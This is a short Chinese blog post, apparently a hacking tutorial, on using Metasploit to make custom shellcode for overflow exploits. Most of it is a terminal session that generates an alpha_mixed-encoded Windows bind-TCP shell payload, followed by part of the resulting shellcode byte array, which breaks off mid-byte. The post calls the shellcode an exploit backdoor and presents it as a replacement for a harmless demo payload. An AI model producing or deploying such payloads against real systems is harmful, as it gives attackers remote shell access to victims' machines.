METASPLOIT 和SHELLCODE

SHELLCODE就是溢出程序的后门。

一个TCP反弹后门,如果某些EXP上的是弹出记事本 我们改如何生成自己想要的SHELLCODE?
首先你要熟悉http://helen.dis9.com/?p=8 (METASPLOIT的PAYLOAD)
我们来生成一个 打开UB 1
生成BIND SHELL吧:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
root@Dis9Team:~# msfpayload windows/shell/bind_tcp R | ./msfencode -e x86/alpha_mixed
[*] x86/alpha_mixed succeeded with size 659 (iteration=1)
 
unsigned char buf[] =
"\x89\xe2\xdb\xdb\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x4d\x38\x4c\x49\x45\x50\x45\x50\x45\x50\x43\x50\x4d\x59"
"\x4d\x35\x50\x31\x49\x42\x42\x44\x4c\x4b\x50\x5
上一篇:Web攻防第 04 讲:Metasploit渗透平台(kali-MSF)


下一篇:metasploit